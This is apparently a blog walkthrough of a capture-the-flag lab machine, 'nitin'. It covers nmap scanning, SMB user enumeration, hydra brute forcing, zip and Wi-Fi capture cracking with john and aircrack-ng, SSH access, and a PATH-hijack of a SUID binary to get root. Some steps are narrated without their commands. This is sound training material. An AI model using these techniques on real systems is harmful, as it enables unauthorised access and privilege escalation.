Hack. Sleep. Repeat

View on GitHub

Scanning With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -p- -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Thu Sep 30 15:13:12 2021 as: nmap -sC -sV -p- -oA nmap
Nmap scan report for
Host is up (0.0020s latency).
Not shown: 65531 closed ports
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
|   256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_  256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h09m48s, deviation: 3h10m31s, median: 2h59m48s
|_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: nitin
|   NetBIOS computer name: NITIN\x00
|   Domain name: 168.1.7
|   FQDN: nitin.168.1.7
|_  System time: 2021-09-30T22:43:15+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-30T17:13:15
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
# Nmap done at Thu Sep 30 15:13:26 2021 -- 1 IP address (1 host up) scanned in 14.68 seconds

We have our scan result and we have SMB open let check it.


└─$ smbclient -L  // -N    

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (nitin server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

But we have no share that we can access let run enum4linux on the target.


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)

Found some users so i try to use it on SMB brute forcing SMB with hydra.


└─$ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt smb   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2021-09-30 15:20:10
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 43033197 login tries (l:3/p:14344399), ~43033197 tries per task
[DATA] attacking smb://
[445][smb] host:   login: smb
[445][smb] Host: Account: sagar Error: Invalid account (Anonymous success)
[445][smb] Host: Account: blackjax Error: Invalid account (Anonymous success)
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2021-09-30 15:21:01

We have smb credentials with no password now let try accessing it using smb with both username and share.


Now all files on my machine let check it out the first file main.txt .


Now let try unzipping it.


But seems we need a password now let try cracking it using john the ripper .


Zip file cracked now let unzip the file with the password we just got from the zip file we cracked.


Seems we have a jpg file and a cap file probably a wireless capture file we can confirm it using wireshark.




└─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap 

Cap file cracked but it a password for what i try using it on the jpg image but i got nothing so i go back to the cap file again with wireshark.


Interesting user blackjax now let try using it on SSH.


Boom we are in and we have user.txt.


sudo -l seems the user blackjax can not run sudo now let check for SUID.

Privilege Escalation


find / -perm -u=s -type f 2>/dev/null

The strange SUID is /usr/bin/netscan interesting right now let check what it does.


Cool a netstat command let string it to confirm.


Seems it possible we can escalate to root using Path variable let give it a shot.


$ cd /tmp
$ echo "/bin/bash" > netstat
$ chmod 777 netstat
$ export PATH=/tmp:$PATH           
$ echo $PATH
$ /usr/bin/netscan
root@nitin:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(blackjax)
root@nitin:/tmp# cd /root
root@nitin:/root# ls

We are root and done.


Greeting From Muzec

Back To Home